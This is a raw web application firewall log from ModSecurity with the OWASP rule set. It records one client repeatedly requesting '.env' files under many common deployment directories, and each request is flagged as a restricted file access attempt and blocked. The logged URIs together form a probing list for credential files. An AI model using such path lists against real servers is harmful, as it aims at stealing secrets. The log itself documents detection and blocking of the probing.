[Mon May 11 17:33:37.293353 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/var/www/.env"] [unique_id "agH20TJnyuKVXoStDhbM4wAAAEs"]
[Mon May 11 17:33:37.293583 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/var/www/.env"] [unique_id "agH20TJnyuKVXoStDhbM4wAAAEs"]
[Mon May 11 17:33:37.293802 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20TJnyuKVXoStDhbM4wAAAEs"]
[Mon May 11 17:33:37.542588 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/var/www/html/.env"] [unique_id "agH20TJnyuKVXoStDhbM5AAAAEs"]
[Mon May 11 17:33:37.542821 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/var/www/html/.env"] [unique_id "agH20TJnyuKVXoStDhbM5AAAAEs"]
[Mon May 11 17:33:37.543036 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20TJnyuKVXoStDhbM5AAAAEs"]
[Mon May 11 17:33:37.657753 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/current/.env"] [unique_id "agH20TJnyuKVXoStDhbM5QAAAEs"]
[Mon May 11 17:33:37.657989 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/current/.env"] [unique_id "agH20TJnyuKVXoStDhbM5QAAAEs"]
[Mon May 11 17:33:37.658219 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20TJnyuKVXoStDhbM5QAAAEs"]
[Mon May 11 17:33:37.772772 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/release/.env"] [unique_id "agH20TJnyuKVXoStDhbM5gAAAEs"]
[Mon May 11 17:33:37.773002 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/release/.env"] [unique_id "agH20TJnyuKVXoStDhbM5gAAAEs"]
[Mon May 11 17:33:37.773224 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20TJnyuKVXoStDhbM5gAAAEs"]
[Mon May 11 17:33:37.887976 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/releases/.env"] [unique_id "agH20TJnyuKVXoStDhbM5wAAAEs"]
[Mon May 11 17:33:37.888211 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/releases/.env"] [unique_id "agH20TJnyuKVXoStDhbM5wAAAEs"]
[Mon May 11 17:33:37.888434 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20TJnyuKVXoStDhbM5wAAAEs"]
[Mon May 11 17:33:38.003203 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/shared/.env"] [unique_id "agH20jJnyuKVXoStDhbM6QAAAEs"]
[Mon May 11 17:33:38.003429 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/shared/.env"] [unique_id "agH20jJnyuKVXoStDhbM6QAAAEs"]
[Mon May 11 17:33:38.003667 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20jJnyuKVXoStDhbM6QAAAEs"]
[Mon May 11 17:33:38.118251 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/deploy/.env"] [unique_id "agH20jJnyuKVXoStDhbM6gAAAEs"]
[Mon May 11 17:33:38.118486 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/deploy/.env"] [unique_id "agH20jJnyuKVXoStDhbM6gAAAEs"]
[Mon May 11 17:33:38.118717 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20jJnyuKVXoStDhbM6gAAAEs"]
[Mon May 11 17:33:38.343541 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/build/.env"] [unique_id "agH20jJnyuKVXoStDhbM6wAAAEs"]
[Mon May 11 17:33:38.343747 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/build/.env"] [unique_id "agH20jJnyuKVXoStDhbM6wAAAEs"]
[Mon May 11 17:33:38.343942 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20jJnyuKVXoStDhbM6wAAAEs"]
[Mon May 11 17:33:38.458297 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/dist/.env"] [unique_id "agH20jJnyuKVXoStDhbM7AAAAEs"]
[Mon May 11 17:33:38.458518 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/dist/.env"] [unique_id "agH20jJnyuKVXoStDhbM7AAAAEs"]
[Mon May 11 17:33:38.458756 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20jJnyuKVXoStDhbM7AAAAEs"]
[Mon May 11 17:33:38.573971 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/public_html/.env"] [unique_id "agH20jJnyuKVXoStDhbM7QAAAEs"]
[Mon May 11 17:33:38.574212 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/public_html/.env"] [unique_id "agH20jJnyuKVXoStDhbM7QAAAEs"]
[Mon May 11 17:33:38.574454 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20jJnyuKVXoStDhbM7QAAAEs"]
[Mon May 11 17:33:38.689547 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/htdocs/.env"] [unique_id "agH20jJnyuKVXoStDhbM7gAAAEs"]
[Mon May 11 17:33:38.689882 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/htdocs/.env"] [unique_id "agH20jJnyuKVXoStDhbM7gAAAEs"]
[Mon May 11 17:33:38.690247 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20jJnyuKVXoStDhbM7gAAAEs"]
[Mon May 11 17:33:38.942612 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/www/.env"] [unique_id "agH20jJnyuKVXoStDhbM7wAAAEs"]
[Mon May 11 17:33:38.942909 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/www/.env"] [unique_id "agH20jJnyuKVXoStDhbM7wAAAEs"]
[Mon May 11 17:33:38.943256 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20jJnyuKVXoStDhbM7wAAAEs"]
[Mon May 11 17:33:39.059074 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/html/.env"] [unique_id "agH20zJnyuKVXoStDhbM8QAAAEs"]
[Mon May 11 17:33:39.059317 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/html/.env"] [unique_id "agH20zJnyuKVXoStDhbM8QAAAEs"]
[Mon May 11 17:33:39.059534 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH20zJnyuKVXoStDhbM8QAAAEs"]
[Mon May 11 17:33:39.174539 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/live/.env"] [unique_id "agH20zJnyuKVXoStDhbM8gAAAEs"]
